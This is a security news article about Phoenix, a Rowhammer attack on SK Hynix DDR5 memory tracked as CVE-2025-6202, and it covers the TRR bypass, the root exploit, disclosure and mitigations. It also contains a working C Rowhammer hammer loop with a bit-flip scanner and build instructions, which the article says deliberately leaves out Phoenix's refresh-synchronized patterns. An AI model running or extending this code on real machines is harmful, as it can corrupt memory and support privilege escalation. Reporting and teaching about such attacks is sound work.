A team of security researchers from ETH Zurich and Google has demonstrated a practical Rowhammer attack against DDR5 memory.
Dubbed Phoenix and tracked as CVE-2025-6202, the DDR5 Rowhammer attack was found to be effective against 15 devices from SK Hynix, the largest DRAM manufacturer.
In a Rowhammer attack, a DRAM memory row is accessed repeatedly to cause electrical interference that leads to bit flips in adjacent rows. This can result in privilege escalation, data corruption, data leakage, and the breaking of memory isolation in virtualized environments.
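The following is an added example, not code from the Phoenix paper or its authors, that shows the basic mechanism described above in C: a buffer is filled with a known pattern, two "aggressor" addresses are read repeatedly with the cache line flushed after each read so that every access is a real DRAM row activation, and the buffer is then scanned for bits that no longer match the pattern. It assumes an x86 machine (the clflush instruction), treats the two ends of the buffer as a hypothetical aggressor pair, and deliberately does not implement Phoenix's refresh-synchronized patterns; on a DIMM with working Target Row Refresh it will almost certainly report zero flips, which is the point the attack sidesteps.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Evict one cache line so the next read of it is served from DRAM (a row
 * activation). clflush exists only on x86; on other architectures this is a
 * no-op and the loop below hits the cache, not the DRAM array. */
static inline void flush_line(const volatile uint8_t *p)
{
#if defined(__x86_64__) || defined(__i386__)
    __asm__ volatile("clflush (%0)" : : "r"(p) : "memory");
#else
    (void)p;
#endif
}

/* Hammer loop: alternately read two aggressor addresses and flush them, so each
 * iteration forces two row activations. Returns the number of iterations run. */
static unsigned long hammer(const volatile uint8_t *agg0,
                            const volatile uint8_t *agg1,
                            unsigned long iters)
{
    volatile uint8_t sink = 0;  /* keeps the reads from being optimized away */
    unsigned long i;
    for (i = 0; i < iters; i++) {
        sink ^= *agg0;
        sink ^= *agg1;
        flush_line(agg0);
        flush_line(agg1);
    }
    return i;
}

/* Compare a buffer against the fill pattern and return the number of flipped
 * bits; optionally print the first few offsets, which is what a researcher
 * uses to map observed flips back to DRAM rows. */
static size_t count_bit_flips(const uint8_t *buf, size_t len, uint8_t pattern,
                              int verbose)
{
    size_t flips = 0, shown = 0;
    for (size_t i = 0; i < len; i++) {
        uint8_t diff = buf[i] ^ pattern;
        if (diff == 0)
            continue;
        flips += (size_t)__builtin_popcount(diff);
        if (verbose && shown++ < 8)
            printf("flip at offset 0x%zx: expected 0x%02x, read 0x%02x\n",
                   i, pattern, buf[i]);
    }
    return flips;
}

/* One hammer round over a freshly allocated buffer: fill, hammer the two ends
 * of the buffer (a hypothetical aggressor pair), scan for flips. Returns the
 * flip count, or SIZE_MAX if allocation fails. Without knowledge of the
 * physical DRAM address mapping the pair is a guess; picking true neighbouring
 * rows is part of the reverse-engineering effort the article describes. */
static size_t rowhammer_round(size_t len, uint8_t pattern, unsigned long iters)
{
    uint8_t *buf = malloc(len);
    if (buf == NULL)
        return SIZE_MAX;
    memset(buf, pattern, len);
    hammer(buf, buf + len - 1, iters);
    size_t flips = count_bit_flips(buf, len, pattern, 1);
    free(buf);
    return flips;
}

/* Self-check of the scanner on a constructed sample (not real hardware data):
 * two bytes with 4 and 1 bits flipped relative to 0xFF, so the count is 5. */
static size_t flip_counter_selfcheck(void)
{
    uint8_t sample[8];
    memset(sample, 0xFF, sizeof sample);
    sample[3] = 0xF0;  /* 4 low bits flipped */
    sample[5] = 0x7F;  /* 1 bit flipped */
    return count_bit_flips(sample, sizeof sample, 0xFF, 0);
}

int main(void)
{
    /* 2 MiB buffer, ten million activations per aggressor */
    size_t flips = rowhammer_round(2u << 20, 0xAA, 10000000UL);
    if (flips == SIZE_MAX) {
        perror("malloc");
        return 1;
    }
    printf("bit flips observed: %zu\n", flips);
    return 0;
}
```

Build with `gcc -O2 -o hammer hammer.c` and run as an unprivileged user; no special permissions are needed because clflush is unprivileged, which is exactly why Rowhammer is reachable from ordinary code. What a real attack adds on top of this loop, and what the Phoenix paper is about, is choosing aggressor rows that are physically adjacent to a victim and timing the accesses so that the in-DRAM tracker does not refresh the victim in time.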
After more than a decade of known Rowhammer attacks targeting CPUs and CPU-attached memory, a group of University of Toronto researchers this year demonstrated that such attacks are possible and practical against GPUs as well.
The newly devised Phoenix attack shows that, despite the more sophisticated in-DRAM Target Row Refresh (TRR) mechanisms meant to prevent Rowhammer attacks, DDR5 is vulnerable too.
To prove it, four ETH Zurich academics and two Google researchers reverse-engineered the TRR schemes in DDR5, finding that a successful attack needs to "precisely track thousands of refresh operations".
In their paper (PDF), the researchers explain that the protections built into DDR5 require significantly longer Rowhammer patterns to bypass, and that these patterns need to stay in sync with thousands of refresh commands.
Phoenix, however, was designed to resynchronize the pattern when missed refresh operations are detected. The resulting bit flips allowed the researchers to build a privilege escalation exploit and obtain root on a commodity DDR5 system with default settings.
"We evaluate Phoenix on 15 DDR5 DIMMs from SK Hynix and show that it can trigger bit flips on all of them. We also demonstrate that the bit flips are exploitable by building the first Rowhammer privilege escalation exploit running in default settings on a PC in as little as 109 seconds," the researchers note.
The researchers say they limited their work to SK Hynix devices because of the extensive effort required to reverse engineer the implemented mitigations, and point out that DDR5 devices from other manufacturers should not be considered safe against Rowhammer attacks.
Tripling the refresh rate, the researchers say, prevents Phoenix from triggering bit flips, but incurs a performance overhead of 8.4%. More principled mitigations, such as per-row activation counters, should stop Rowhammer attacks completely, they say.
Phoenix was disclosed to SK Hynix, CPU vendors, and major cloud providers in early June. Last week, AMD released BIOS updates to address CVE-2025-6202 in client machines, the researchers note.